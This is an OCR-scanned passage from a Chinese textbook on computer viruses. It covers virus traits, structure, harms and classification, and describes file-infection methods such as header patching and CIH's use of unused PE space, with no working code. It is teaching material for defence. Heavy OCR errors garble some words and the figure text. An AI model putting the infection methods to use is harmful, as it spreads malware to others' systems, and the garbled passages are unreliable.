益 猩 狐 ， 利 用 病毒 木马 技术 进行 网 络 盗窃、 诈骗 的 网 络 犯罪 活动 呈 快 速 上 升 趋势 ， 这 些 情 
况 进 一 步 显 示 计 算 机 病毒 新 的 发 展 趋势 。 


8.1.3 计算 机 病毒 的 特征 


要 防范 计算 机 病毒 ， 首 先 需要 了 解 计 算 机 病毒 的 特征 和 破坏 机 理 ， 为 防范 和 清除 计算 
机 病毒 提供 充实 可 靠 的 依据 。 根 据 计 算 机 病毒 的 产生 、 传 染 和 破坏 行为 的 分 析 ， 计 算 机 病 
毒 一 般 具 有 以 下 特征 ， 非 授权 可 执行 性 、 隐 蔽 性 、 传 染 性 、 潜 伏 性 、 破 坏 性 和 可 触发 性 。 

1， 非 授权 可 执行 性 

用 户 通常 调用 执行 一 个 程序 时 , 把 系统 控制 交 给 这 个 程序 , 并 分 配给 它 相应 系统 资源 ， 
如 内 存 ， 从 而 使 之 能 够 运行 完成 用 户 的 需求 ， 因 此 程序 执行 的 过 程 对 用 户 是 透明 的 。 而 计 
算 机 病毒 是 非法 程序 ， 正 常用 户 是 不 会 明知 是 病毒 程序 ， 而 故意 调用 执行 。 但 由 于 计算 机 
病毒 具有 正常 程序 的 一 切 特性 : 可 存储 性 、 可 执行 性 。 它 隐藏 在 合法 的 程序 或 数据 中 ， 当 
用 户 运行 正常 程序 时 ， 病 毒 伺 机 窃取 到 系统 的 控制 权 ， 得 以 抢先 运行 ， 然 而 此 时 用 户 还 认 
为 在 执行 正常 程序 。 

2， 隐 蔽 性 

计算 机 病毒 是 一 种 具有 很 高 编程 技巧 、 短 小 精 悍 的 可 执行 程序 。 它 通常 粘 附 在 正常 程 
序 之 中 或 磁盘 引导 扇 区 中 ， 或 者 磁盘 上 标 为 坏 簇 的 扇 区 中 ， 以 及 一 些 空 亲 概率 较 大 的 扇 区 
中 ， 这 是 它 的 非法 可 存储 性 。 病 毒 想方设法 隐藏 自身 ， 就 是 为 了 防止 用 户 察觉 。 

3. 传染 性 

计算 机 病毒 不 但 本 身 具 有 破坏 性 ， 更 有 害 的 是 具有 传染 性 ， 一 旦 病毒 被 复制 或 产生 变 
种 ， 其 速度 之 快 令 人 难以 预防 。 传 染 性 是 病毒 的 基本 特征 。 在 生物 界 ， 病 毒 通过 传染 从 一 
个 生物 体 扩散 到 另 一 个 生物 体 。 在 适当 的 条 件 下 ， 它 可 得 到 大 量 繁殖 ， 并 使 被 感染 的 生物 
体 表 现 出 病症 甚至 死亡 。 同 样 ， 计 算 机 病毒 也 会 通过 各 种 渠道 从 已 被 感染 的 计算 机 扩散 到 
未 被 感染 的 计算 机 ， 在 某 些 情况 下 造成 被 感染 的 计算 机 工作 失常 甚至 竣 疾 。 与 生物 病毒 不 
同 的 是 ， 计 算 机 病毒 是 一 段 人 为 编制 的 计算 机 程序 代码 ， 这 段 程序 代码 一 旦 进入 计算 机 并 
得 以 执行 ， 它 就 会 搜寻 其 他 符合 其 传染 条 件 的 程序 或 存储 介质 ， 确 定 目标 后 再 将 自身 代码 


插入 其 中 ， 达 到 自我 繁殖 的 目的 。 只 要 一 台 计 算 机 染 毒 ， 如 不 及 时 处 理 ， 那 么 病毒 会 在 这 
台 计 算 机 上 迅速 扩散 ， 计 算 机 病毒 可 通过 各 种 可 能 的 渠道 ， 如 软盘 、 计 算 机 网 络 去 传染 其 
他 的 计算 机 。 当 在 一 台 计算 机 上 发 现 病毒 时 ， 往 往 曾 在 这 台 计 算 机 上 用 过 的 软盘 已 感染 上 
了 病毒 ， 而 与 这 台 机 器 相 联网 的 其 他 计算 机 也 许 也 被 该 病毒 染 了 。 是 否 具有 传染 性 是 判别 
一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 病 毒 程序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 并 
把 自身 嵌入 到 其 中 的 方法 达到 病毒 的 传染 和 扩散 。 

4. 潜伏 性 

计算 机 病毒 具有 依附 于 其 他 媒体 而 寄生 的 能 力 ， 这 种 媒体 我 们 称 之 为 计算 机 病毒 的 宿 
主 。 依 靠 病 毒 的 寄生 能 力 ， 病 毒 传染 合法 的 程序 和 系统 后 ， 不 立即 发 作 ， 而 是 悄悄 隐藏 起 
来 ， 然 后 在 用 户 不 察觉 的 情况 下 进行 传染 。 这 样 ， 病 毒 的 潜伏 性 越 好 ， 它 在 系统 中 存在 的 
时 间 也 就 越 长 ， 病 毒 传染 的 范围 也 越 广 ， 其 危害 性 也 越 大 。 

S。 破坏 性 

无 论 何 种 病毒 程序 一 旦 侵入 系统 都 会 对 操作 系统 的 运行 造成 不 同 程度 的 影响 。 即 使 不 
直接 产生 破坏 作用 的 病毒 程序 也 要 占用 系统 资源 〈 如 占用 内 存 空 间 ， 占 用 磁盘 存储 空间 以 
及 系统 运行 时 间 等 )。 而 绝 大 多 数 病毒 程序 要 显示 一 些 文字 或 图 像 ， 影 响 系 统 的 正常 运行 ， 
还 有 一 些 病毒 程序 删除 文件 ， 加 密 磁盘 中 的 数据 ， 其 至 摧毁 整个 系统 和 数据 ， 使 之 无 法 恢 
复 ， 造 成 无 可 挽回 的 损失 。 因 此 ， 病 毒 程序 的 副作用 轻 者 降低 系统 工作 效率 ， 重 者 导致 系 
统 崩 溃 、 数 据 丢失 。 病 毒 程序 的 破坏 性 体现 了 病毒 设计 者 的 真正 意图 。 

6， 可 触发 性 

计算 机 病毒 一 般 都 有 一 个 或 者 儿 个 触发 条 件 。 满 足 其 触发 条 件 或 者 激活 病毒 的 传染 机 
制 , 使 之 进行 传染 , 或 者 激活 病毒 的 表现 部 分 或 破坏 部 分 。 触 发 的 实质 是 一 种 条 件 的 控制 ， 
病毒 程序 可 以 依据 设计 者 的 要 求 , 在 一 定 条 件 下 实施 攻击 。 这 个 条 件 可 以 是 裔 入 特定 字符 ， 
使 用 特定 文件 ， 某 个 特定 日 期 或 特定 时 刻 ， 或 者 是 病毒 内 置 的 计数 器 达到 一 定 次 数 等 。 
8.1.4 计算 机 病毒 的 结构 


计算 机 病毒 主要 由 潜伏 机 制 、 传 染 机 制 和 表现 机 制 构成 。 在 程序 结构 上 由 实现 这 三 种 
机 制 的 模块 组 成 ， 见 图 8-1 所 示 。 
若 某 程序 被 定义 为 计算 机 病毒 ， 只 有 传染 机 制 是 强 


制 性 的 ， 潜 伏 机 制 和 表现 机 制 是 非 强制 性 的 。 计算 机 病毒 程序 
1， 潜伏 机 制 ee 
潜伏 机 制 的 功能 包括 初始 化 、 隐 藏 和 捕捉 。 潜 伏 机 伏 | | 染 | | 到 

制 模块 随 着 感染 的 宿主 程序 的 执行 进入 内 存 ， 首 先 ， 初 机 | | 机 | | 名 

始 化 其 运行 环境 ， 使 病毒 相对 独立 于 宿主 程序 ， 为 传染 st esd 

机 制 做 好 准备 。 然 后 ， 利 用 各 种 可 能 的 隐藏 方式 ， 角 过 块 | | 次 | | 区 


各 种 检测 ， 欺 骗 系 统 ， 将 自己 隐藏 起 来 。 最 后 ， 不 停 地 
捕捉 感染 目标 交 给 传染 机 制 ， 不 停 地 捕捉 触发 条 件 交 给 图 8-1 计算 机 病毒 程序 结构 
表现 机 制 。 

2. 传染 机 制 

传染 机 制 的 功能 包括 判断 和 感染 。 传 染 机 制 先是 判断 候选 感染 目标 是 否 已 被 感染 ， 感 
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染 与 否 通过 感染 标记 来 判断 ， 感 染 标记 是 计算 机 系统 可 以 识别 的 特定 字符 或 字符 串 。 一 旦 
发 现 作为 候选 感染 目标 的 宿主 程序 中 没有 感染 标记 ， 就 对 其 进行 感染 ， 也 就 是 将 病毒 代码 
和 感染 标记 放 入 宿主 程序 之 中 。 早 期 的 有 些 病毒 是 重复 感染 型 的 ， 它 不 做 感染 检查 ， 也 没 
有 感染 标记 ， 因 此 这 种 病毒 可 以 再 次 感染 自身 。 

3， 表现 机 制 

表现 机 制 的 功能 包括 判断 和 表现 。 表 现 机 制 首 先 对 触发 条 件 进行 判断 ， 然 后 根据 不 同 
的 条 件 决 定 什么 时 候 表现 、 如 何 表现 。 表 现 内容 多 种 多 样 ， 然 而 不 管 是 炫耀 、 玩 笑 、 恶 作 
剧 ， 还 是 故意 破坏 ， 或 轻 或 重 都 具有 破坏 性 。 表 现 机 制 反映 了 病毒 设计 者 的 意图 ， 是 病毒 
间 差异 最 大 的 部 分 。 潜 伏 机 制 和 传染 机 制 是 为 表现 机 制服 务 的 。 


8.1.5 计算 机 病毒 的 危害 


计算 机 病毒 ， 既 然 称 之 为 病毒 ， 自 然 对 计算 机 用 户 具有 一 定 的 危害 ， 这 种 危害 通常 表 
现在 以 下 7 个 方面 。 

1. 病毒 激发 对 计算 机 数据 信息 的 直接 破坏 作用 

大 部 分 病毒 在 激发 的 时 候 直 接 破 坏 计算 机 的 重要 数据 ， 所 利用 的 手段 有 格式 化 磁盘 、 
改写 文件 分 配 表 和 目录 区 、 删 除 重要 文件 或 者 用 无 意义 的 “垃圾 ”数据 改写 文件 .破坏 CMOS 
设置 等 。 

2， 占用 磁盘 空间 和 对 信息 的 破坏 

寄生 在 磁盘 上 的 病毒 总 要 非法 占用 一 部 分 磁盘 空间 。 引 导 型 病毒 的 一 般 侵占 方式 是 由 
病毒 本 身 占据 磁盘 引导 扇 区 ， 而 把 原来 的 引导 区 转移 到 其 他 肩 区 ， 也 就 是 引导 型 病毒 要 获 
盖 一 个 磁盘 扇 区 。 被 覆盖 的 肩 区 数据 永久 性 丢失 ， 无 法 恢复 。 文 件 型 病毒 利用 一 些 DOS 
功能 进行 传染 , 这 些 DOS 功能 能 够 检测 出 磁盘 的 未 用 空间 , 把 病毒 的 传染 部 分 写 到 磁盘 的 
未 用 部 分 去 。 所 以 在 传染 过 程 中 一 般 不 破坏 磁盘 上 的 原 有 数据 ， 但 非法 侵占 了 磁盘 空间 ， 
一 些 文件 型 病毒 传染 速度 很 快 , 在 短 时 间 内 感染 大 量 文件 , 每 个 文件 都 不 同 程度 地 加 长 了 ， 
就 造成 磁盘 空间 的 严重 浪费 。 

3. 抢占 系统 资源 

除 Vienna、Casper 等 少数 病毒 外 ， 其 他 大 多 数 病毒 都 是 常 驻 内 存 的 ， 这 就 必然 抢占 一 
部 分 系统 资源 。 病 毒 所 占用 的 基本 内 存 长 度 大 致 与 病毒 本 身长 度 相当 ， 病 毒 抢 占 内 存 ， 导 
致 内 存 减 少 ， 一 部 分 软件 不 能 运行 。 除 占用 内 存 外 ， 病 毒 还 抢占 中 断 ， 干 扰 系统 运行 。 计 
算 机 操作 系统 的 很 多 功能 是 通过 中 断 调用 技术 来 实现 的 ， 病 毒 为 了 传染 激发 ， 总 是 修改 一 
些 有 关 的 中 断 地 址 ， 在 正常 中 断 过 程 中 加 入 病毒 的 “ 私 货 ”， 从 而 干扰 了 系统 的 正常 运行 。 

4. 影响 计算 机 运行 速度 

病毒 进驻 内 存 后 不 但 干扰 系统 运行 ， 还 影响 计算 机 速度 ， 主 要 表现 在 以 下 几 个 方面 。 

(1) 病毒 为 了 判断 传染 激发 条 件 ， 总 要 对 计算 机 的 工作 状态 进行 监视 ， 这 对 于 计算 机 
的 正常 运行 状态 既 多 余 又 有 害 。 

(2) 有 些 病毒 为 了 保护 自己 ， 不 但 对 磁盘 上 的 静态 病毒 加 密 ， 而 且 进驻 内 存 后 的 动态 
病毒 也 处 在 加 密 状 态 ，CPU 每 次 寻 址 到 病毒 处 时 要 运行 一 段 解密 程序 把 加 密 的 病毒 解密 成 
合法 的 CPU 指令 再 执行 ， 而 病毒 运行 结束 时 再 用 一 段 程序 对 病毒 重新 加 密 。 这 样 CPU 将 


额外 执行 数 千 条 以 至 上 万 条 指令 。 

(3) 病毒 在 进行 传染 时 同样 要 插入 非法 的 额外 操作 ， 特 别 是 传染 软盘 时 不 但 计算 机 速 
度 明显 变 慢 ， 而 且 软盘 正常 的 读 写 顺 序 被 打 乱 ， 发 出 刺耳 的 噪声 。 

5. 计算 机 病毒 错误 与 不 可 预见 的 危害 

计算 机 病毒 与 其 他 计算 机 软件 的 一 大 差别 是 病毒 的 无 责任 性 。 编 制 一 个 完善 的 计算 机 
软件 需要 耗费 大 量 的 人 力 、 物 力 ， 经 过 长 时 间 调 试 完善 ， 软 件 才能 推出 。 但 在 病毒 编制 者 
看 来 既 没 有 必要 这 样 做 ， 也 不 可 能 这 样 做 。 很 多 计算 机 病毒 都 是 个 别人 在 一 台 计 算 机 上 匆 
匆 编制 调试 后 就 向 外 抛 出 。 反 病毒 专家 在 分 析 大 量 病毒 后 发 现 绝 大 部 分 病毒 都 存在 不 同 程 
度 的 错误 ， 错 误 病 毒 的 另 一 个 主要 来 源 是 变种 病毒 。 有 些 计算 机 初学 者 尚 不 具备 独立 编制 
软件 的 能 力 ， 出 于 好 奇 或 其 他 原因 修改 别人 的 病毒 ， 造 成 错误 。 计 算 机 病毒 错误 所 产生 的 
后 果 往 往 是 不 可 预见 的 ， 反 病毒 工作 者 曾经 详细 指出 “黑色 星期 五 ”病毒 存在 9 处 错误 ， 
“乒乓 ”病毒 有 5 处 错误 等 。 但 是 人 们 不 可 能 花费 大 量 时 间 去 分 析 数 万 种 病毒 的 错误 所 在 。 
大 量 含有 未 知 错误 的 病毒 扩散 传播 ， 其 后 果 是 难以 预料 的 。 

6. 计算 机 病毒 的 兼容 性 对 系统 运行 的 影响 

兼容 性 是 计算 机 软件 的 一 项 重要 指标 ， 兼 容 性 好 的 软件 可 以 在 各 种 计算 机 环境 下 运 
行 ， 反之 兼容 性 差 的 软件 则 对 运行 条 件 “ 挑 肥 拱 瘦 ”， 要 求 机 型 和 操作 系统 版 本 等 。 病毒 的 
编制 者 一 般 不 会 在 各 种 计算 机 环境 下 对 病毒 进行 测试 ， 因 此 病毒 的 兼容 性 较 差 ， 常 常 导致 
死机 。 

7. 计算 机 病毒 给 用 户 造成 严重 的 心理 压力 

据 有 关 计 算 机 销售 部 门 统计 ， 计 算 机 售后 用 户 怀疑 “计算 机 有 病毒 ”而 提出 咨询 约 占 
售后 服务 工作 量 的 60% 以 上 。 经 检测 确实 存在 病毒 的 约 占 70%， 另 有 30% 情 况 只 是 用 户 怀 
疑 ， 而 实际 上 计算 机 并 没有 中 病毒 。 那 么 用 户 怀疑 病毒 的 理由 是 什么 呢 ? 多 半 是 出 现 诸如 
计算 机 死机 、 软 件 运行 异常 等 现象 。 这 些 现 象 确实 很 有 可 能 是 计算 机 病毒 造成 的 ， 但 又 不 
全 是 ， 实 际 上 计算 机 工作 “异常 ”的 时 候 很 难 要 求 一 位 普通 用 户 去 准确 判断 是 否 是 病毒 所 
为 。 大 多 数 用 户 对 病毒 采取 宁可 信 其 有 的 态度 , 这 对 于 保护 计算 机 安全 无 疑 是 十 分 必要 的 ， 
然而 往往 要 付出 时 间 、 金 钱 等 方面 的 代价 。 仅 仅 怀 疑 病毒 而 冒 然 格 式 化 磁盘 所 带 来 的 损失 
更 是 难以 弥补 的 。 不 仅 是 个 人 单机 用 户 , 在 一 些 大 型 网 络 系统 中 也 难免 为 甄别 病毒 而 停机 。 
总 之 计算 机 病毒 像 “ 幽 灵 ” 一 样 笼 日 在 广大 计算 机 用 户 心头 , 给 和 人们 造成 巨大 的 心理 压力 ， 
极 大 地 影响 了 现代 计算 机 的 使 用 效率 ， 由 此 带 来 的 经 济 损失 是 难以 估量 的 。 


8.1.6 计算 机 病毒 分 类 


通常 ， 计 算 机 病毒 可 分 为 下 列 儿 类 。 

1. 按 寄生 方式 分 类 

(1) 引导 型 病毒 。 引 导 型 病毒 是 指 寄生 在 磁盘 引导 区 或 主 引导 区 的 计算 机 病毒 。 此 种 
病毒 利用 系统 引导 时 ， 不 对 主 引 导 区 的 内 容 正 确 与 否 进行 判别 的 缺点 ， 在 引导 型 系统 的 过 
程 中 侵入 系统 ， 驻 留 内 存 ， 监 视 系统 运行 ， 待 机 传染 和 破坏 。 按 照 引 导 型 病毒 在 硬盘 上 的 
寄生 位 置 又 可 细 分 为 主 引导 记录 病毒 和 分 区 引导 记录 病毒 。 主 引导 记录 病毒 感染 硬盘 的 主 
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引导 区 ， 如 大 麻 病 毒 、2708 病毒 、 火 炬 病毒 等 ， 分 区 引导 记录 病毒 感染 硬盘 的 活动 分 区 引 
导 记 录 ， 如 小 球 病毒 、Girl 病毒 等 。 

(2) 文件 型 病毒 。 文 件 型 病毒 是 指 能 够 寄生 在 文件 中 的 计算 机 病毒 。 这 类 病毒 程序 感 
染 可 执行 文件 或 数据 文件 。 如 1575/1591 病毒 、848 病毒 感染 .com 和 .exe 等 可 执行 文件 ， 
Macro/Concept、Macro/Atoms 等 宏 病 毒 感 染 .doc 文件 。 

(3) 复合 型 病毒 。 复 合 型 病毒 是 指 具 有 引导 型 病毒 和 文件 型 病毒 寄生 方式 的 计算 机 病 
毒 。 这 种 病毒 扩大 了 病毒 程序 的 传染 途径 ， 它 既 感 染 磁 盘 的 引导 记录 ， 又 感染 可 执行 文件 。 
当 染 有 此 种 病毒 的 磁盘 用 于 引导 系统 或 调用 执行 染 毒 文件 时 ， 病 毒 都 会 被 激活 。 因 此 在 检 
测 、 清 除 复合 型 病毒 时 ， 必 须 全 面 彻底 地 根治 ， 如 果 只 发 现 该 病毒 的 一 个 特性 ， 把 它 只 当 
做 引导 型 或 文件 型 病毒 进行 清除 。 虽 然 好 像 是 清除 了 ， 但 还 留 有 隐患 ， 这 种 经 过 消毒 后 的 
“洁净 ”系统 更 赋 有 攻击 性 。 这 种 病毒 有 Flip 病毒 、 新 世纪 病毒 、One-half 病毒 等 。 

2， 按 破坏 性 分 类 

(1) 良性 病毒 。 良 性 病毒 是 指 那些 只 是 为 了 表现 自身 ， 并 不 彻底 破坏 系统 和 数据 ， 但 
会 大 量 占用 CPU 时 间 , 增加 系统 开销 ， 降 低 系统 工作 效率 的 一 类 计算 机 病毒 。 这 种 病毒 多 
数 是 恶作剧 者 的 产物 ， 他 们 的 目的 不 是 为 了 破坏 系统 和 数据 ， 而 是 为 了 让 使 用 染 有 病毒 的 
计算 机 用 户 通 过 显示 器 或 扬声器 看 到 或 听 到 病毒 设计 者 的 编程 技术 。 这 类 病毒 有 小 球 病 毒 、 
1575/1591 病毒 、 救 护 车 病毒 、 扬 基 病 毒 、Dabi 病毒 等 。 还 有 一 些 人 利用 病毒 的 这 些 特 点 
宣传 自己 的 政治 观点 和 主张 ， 也 有 一 些 病毒 设计 者 在 其 编制 的 病毒 发 作 时 进行 人 身 
攻击 。 

(2) 恶性 病毒 。 恶 性 病毒 是 指 那些 一 旦 发 作 后 ， 就 会 破坏 系统 或 数据 ， 造 成 计算 机 系 
统 瘫痪 的 一 类 计算 机 病毒 。 这 类 病毒 有 黑色 星期 五 病毒 、 火 炬 病毒 、 米 开朗 基 罗 病毒 等 。 
这 种 病毒 危害 性 极 大 ， 有 些 病毒 发 作 后 可 以 给 用 户 造成 不 可 挽回 的 损失 。 

3. 按 入 侵 方式 分 类 

(1) 源 代码 嵌入 攻击 型 。 这 类 病毒 入 侵 的 主要 是 高 级 语言 的 源 程序 ， 病 毒 在 源 程序 编 
译 之 前 插入 病毒 代码 ， 最 后 随 源 程序 一 起 被 编译 成 可 执行 文件 ， 这 样 刚 生成 的 文件 就 是 带 
毒 文件 。 

(2) 代码 取代 攻击 型 。 这 类 病毒 主要 用 它 自 身 的 病毒 代码 取代 某 个 入 侵 程序 的 整个 或 
部 分 模块 ， 这 类 病毒 也 少见 ， 它 主要 是 攻击 特定 的 程序 ， 针 对 性 较 强 ， 但 是 不 易 被 发 现 ， 
清除 起 来 比较 困难 。 

(3) 系统 修改 型 。 这 类 病毒 主要 是 用 自身 程序 覆盖 或 修改 系统 中 的 某 些 文件 来 达到 调 
用 或 替代 操作 系统 中 的 部 分 功能 的 目的 ， 由 于 是 直接 感染 系统 ， 危 害 较 大 ， 也 是 最 为 多 见 
的 一 种 病毒 类 型 ， 多 为 文件 型 病毒 。 

(4) 外 壳 附 加 型 。 这 类 病毒 通常 是 将 其 病毒 附加 在 正常 程序 的 头 部 或 尾部 ， 相 当 于 给 
程序 添加 了 一 个 外 这， 在 被 感染 的 程序 执行 时 ， 病 毒 代码 先 被 执行 ， 然 后 才 将 正常 程序 调 
入 内 存 。 目 前 大 多 数 文件 型 病毒 属于 这 一 类 。 

除 上 述 这 些 病毒 外 , 还 有 其 他 一 些 毁 坏 性 的 代码 ， 如 逻辑 炸弹 、 特 洛 伊 木 马 和 蜂 虫 等 ， 
它们 会 窃取 系统 资源 或 损坏 数据 ， 但 并 不 从 技术 上 归 类 为 病毒 ， 因 为 它们 并 不 复制 自己 ， 


但 它们 仍然 是 很 危险 的 。 
8.2 ”计算 机 病毒 技术 


随 着 软件 技术 的 发 展 ， 计 算 机 病毒 所 使 用 的 技术 也 越 来 越 复杂 化 。 计 算 机 黑客 们 不 断 
跟踪 最 新 的 计算 机 技术 ， 不 断 尝 试 把 新 技术 用 于 病毒 ， 例 如 寄生 技术 、 驻 留 技术 、 加 密 变 
形 技术 和 隐藏 技术 等 。 


8.2.1 寺 生 技术 


病毒 寄生 技术 是 文件 型 病毒 最 常用 的 传染 方法 。 病 毒 在 感染 的 时 候 ， 将 病毒 代码 加 入 
正常 程序 之 中 ， 原 正常 程序 功能 的 全 部 或 者 部 分 被 保留 。 根 据 病毒 代码 加 入 方式 的 不 同 ， 
病毒 寄生 技术 可 以 分 为 “ 头 寄生 ”“ 尾 寄生 ”、“ 插 入 寄生 ”和 “空洞 利用 ”4 种 。 前 三 种 
是 源 病毒 代码 插入 宿主 程序 位 置 的 不 同 ; 而 “空洞 利用 ”的 原理 是 由 于 Windows 可 执行 文 
件 的 结构 非常 复杂 ， 里 面 都 会 有 很 多 没有 使 用 的 部 分 ， 一 般 是 空 的 段 或 者 每 个 段 的 最 后 部 
分 ， 病 毒 寻找 这 些 没 有 使 用 的 部 分 ， 然 后 将 病毒 代码 分 散 到 其 中 ， 这 样 就 实现 了 令 人 难以 
觉察 的 感染 ， 因 为 被 感染 文件 的 大 小 没有 发 生变 化 。 著 名 的 CIH 病毒 就 是 使 用 了 “空洞 利 
用 ”寄生 技术 。 

1， 头 寡 生 

实现 将 病毒 代码 放 到 程序 的 头 上 有 两 种 方法 ， 一 种 是 将 原来 程序 的 前 面 一 部 分 拷贝 到 
程序 的 最 后 ， 然 后 将 文件 头 用 病毒 代码 覆盖 ， 另 外 一 种 是 生成 一 个 新 的 文件 ， 首 先 在 头 的 
位 置 写 上 病毒 代码 ， 然 后 将 原来 的 可 执行 文件 放 在 病毒 代码 的 后 面 ， 再 用 新 的 文件 替换 原 
来 的 文件 从 而 完成 感染 。 

使 用 “ 头 寄 生 ” 方 式 的 病毒 基本 上 感染 的 是 批 处 理 病毒 和 COM 格式 的 文件 ， 因 为 这 
些 文件 在 运行 的 时 候 不 需要 重新 定位 , 所 以 可 以 任意 调换 代码 的 位 置 而 不 发 生 错 误 。“ 头 寄 
生 ” 的 方式 如 图 8-2 所 示 。 


原 程序 代码 头 感染 方式 1 病毒 代码 
原 程序 代码 原 程序 代码 
原 程序 代码 站 
a 程序 代码 头 
感染 方式 2 | 一 一 一 一 一 : 
原 程序 代码 头 
原 程序 代码 


图 8-2 “ 头 寄生 ”感染 方式 


当然 , 随 着 病毒 制作 水 平 的 提高 , 很 多 感染 DOS 下 的 EXE 文件 和 视窗 系统 的 EXE 文 
件 的 病毒 也 是 用 了 头 寄 生 的 方式 ， 为 使 得 被 感染 的 文件 仍然 能 够 正常 运行 ， 病 毒 在 执行 原 
来 程序 之 前 会 还 原 出 原来 没有 感染 过 的 文件 用 来 正常 执行 ,执行 完毕 之 后 再 进行 一 次 感染 ， 
保证 硬盘 上 的 文件 处 于 感染 状态 ， 而 执行 的 文件 又 是 一 切 正常 的 ， 如 图 8-3 所 示 。 
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EXE 文件 头 感染 后 的 EXE 文 件 头 
病毒 代码 
EXE 可 执行 文件 的 内 容 
EXE 可 执行 文件 的 内 容 
四 
执行 时 还 原 


图 8-3 EXE 文件 “ 头 寄生 ”方式 


2， 尾 寡 生 
由 于 头 寄生 不 可 避免 地 会 遇 到 重新 定位 的 问题 ， 所 以 最 简单 也 是 最 常用 的 寄生 方法 就 


是 直接 将 病毒 代码 附加 到 可 执行 程序 的 尾部 。 对 于 DOS 环境 下 COM 可 执行 文件 来 说 ， 由 
于 COM 文件 就 是 简单 的 二 进 制 代码 ， 没 有 任何 结构 信息 ， 所 以 可 以 直接 将 病毒 代码 附加 
到 程序 的 尾部 ， 然 后 改动 COM 文件 开始 的 三 个 字 节 为 跳 转 指令 ， 如 图 8-4 所 示 。 


JMP [病毒 代码 开始 地 址 ] 


感染 JMP 病毒 代码 地 址 


原始 COM 程序 代码 


原始 COM 程序 代码 


病毒 代码 
图 8-4 COM 文件 的 “ 尾 寄生 ” 


对 于 DOS 环境 下 的 EXE 文件 ， 有 两 种 处 理 的 方法 ， 一 种 是 将 EXE 格式 转换 成 COM 


格式 再 进行 感染 ， 另 外 一 种 需要 修改 EXE 文件 的 文件 头 ， 一 般 会 修改 EXE 文件 头 的 下 面 
几 个 部 分 : 


(1) 代码 的 开始 地 址 ; 

(2) 可 执行 文件 的 长 度 ; 

(3) 文件 的 CRC 校 验 值 ; 

(4) 堆栈 寄存 器 的 指针 。 

对 于 Windows 操作 系统 下 的 EXE 文件 ， 病 毒 感染 后 同样 需要 修改 文件 的 头 部 。 这 次 


修改 的 是 PE 或 者 NE 的 头 ， 相 对 于 DOS 下 EXE 文件 的 头 来 说 ， 这 项 工作 要 复杂 很 多 ， 需 
要 修改 程序 入 口 地 址 、 段 的 开始 地 址 、 段 的 属性 等 ， 如 图 8-5 所 示 。 由 于 这 项 工作 的 复杂 


性 


， 所 以 很 多 病毒 在 编写 感染 代码 的 时 候 会 包括 一 些小 错误 ， 造 成 这 些 病毒 在 感染 一 些 文 


rH 


的 时 候 会 出 错 而 无 法 继续 ， 从 而 幸运 地 造成 这 些 病毒 无 法 大 规模 地 流行 。 
感染 DOS 环境 下 设备 驱动 程序 (.sys 文件 ) 的 病毒 会 在 DOS 启动 之 后 立刻 进入 系统 ， 


而 且 对 于 随后 加 载 的 任何 软件 (包括 杀毒 软件 ) 来 说 ， 所 有 的 文件 操作 (包括 可 能 的 查 病 
毒 和 杀 病 毒 操 作 〉 都 在 病毒 的 监控 之 下 。 在 这 种 情况 下 ， 干 净 地 清除 病毒 基本 上 是 不 可 
能 的 。 


DOS EXE 文 件 头 (修改 后 ) 
DOS EXE 文 件 头 PE (NE) 文件 头 (修改 后 ) 
PE (NE) 文件 头 

感染 前 的 程序 
感染 前 的 程序 
病毒 代码 
(a) (b) 
图 8-5 感染 前 后 代码 对 比 
3. 插入 寡 生 


病毒 将 自己 插入 被 感染 的 程序 中 ， 可 以 整 段 地 搬入， 也 可 以 分 成 很 多 段 ， 有 的 病毒 通 
过 压缩 原来 的 代码 的 方法 ， 保 持 被 感染 文件 的 大 小 不 变 。 前 面 论 述 的 更 改 文件 头等 基本 操 
作 同 样 需 要 ， 对 于 中 间 插 入 来 说 ， 要 求 程序 的 编写 更 加 严谨 。 所 以 采用 这 种 方式 的 病毒 相 
对 比较 少 ， 即 使 采用 了 这 种 方式 ， 很 多 病毒 也 由 于 程序 编写 上 的 错误 没有 真正 流行 起 来 。 
“插入 寄生 ”方式 如 图 8-6 所 示 。 


DOS EXE 文 件 头 DOS EXE 文 件 头 (修改 后 ) 
PE (NE) 文件 头 PE (NE) 文件 头 (修改 后 ) 

病毒 代码 
让 感染 前 的 程序 (经 过 压缩 ) 

病毒 代码 
感染 前 的 程序 (没有 压缩 ) 

(a) (b) 

图 8-6 “插入 寄生 ”方式 
4. 空洞 利用 


对 于 Windows 环境 下 的 可 执行 文件 ,“ 空 洞 利用 ”是 很 有 创意 的 方式 。CIH 使 用 了 此 
方式 ， 示 意 如 图 8-7 所 示 。 

CIH 病毒 的 首 块 程 序 是 插 在 PE 文件 头 的 自由 空间 内 的 。 通 常 PE 格式 文件 头 的 大 小 为 
1024 字 节 ， 而 MZ (DOS 可 执行 文件 头 ) 为 128 字 节 ，PE 文件 头 〈 包 括 PE 文件 的 标志 ) 
为 24 字 节 ，PE 可 选 文件 头 为 224 字 节 ， 以 上 共 376 字 节 。“ 程 序 段 头 ”区 域 大 小 是 根据 程 
序 段 的 数量 来 确定 的 ， 但 每 个 程序 段 头 的 大 小 是 固定 的 ， 为 40 字 节 。 一 般 情 况 下 ， 一 个 
PE 可 执行 文件 有 5 一 6 个 段 ,， 这 样 计 算 下 来 ,整个 文件 头 有 408 一 448 字 节 的 自由 空间 提供 
给 病毒 使 用 ， 剩 余 的 病毒 代码 分 块 依次 插入 到 各 段 的 自由 空间 里 。 

寄生 病毒 精确 地 实现 了 病毒 的 定义 ,“ 寄 生 在 宿主 程序 之 内 ， 并 且 不 破坏 宿主 程序 的 
正常 功能 ”。 所 以 寄生 病毒 设计 的 初衷 都 希望 能 够 完整 地 保存 原来 程序 的 所 有 内 容 , 因此 除 
了 某 些 由 于 程序 设计 失误 造成 原来 的 程序 不 能 恢复 的 病毒 以 外 ， 寄 生 型 病毒 基本 上 都 是 可 
以 完全 清除 的 。 


第 
8 
章 


矿 食 机 将 三 失 夺 渗 


克 乡 委 会 贡 大 理论 与 笑 践 


感染 CIH 病 毒 之 前 


感染 CIH 病 毒 之 后 


DOS 的 MZ 的 文件 头 


DOS 的 MZ 的 文件 头 


DOS 的 实 模式 存根 程序 (在 DOS 下 
执行 Windows 程 序 时 使 用 这 个 存根 
程序 ) 


DOS 的 实 模式 存根 程序 (在 DOS 下 
执行 Windows 程 序 时 使 用 这 个 存根 
程序 ) 


PE 文件 标志 (00PE0000) 


PE 文件 标志 (00PE0000) 


PE 文件 头 PE 文件 头 

PE 文件 可 选 头 PE 文件 可 选 头 〈 被 修改 ) 

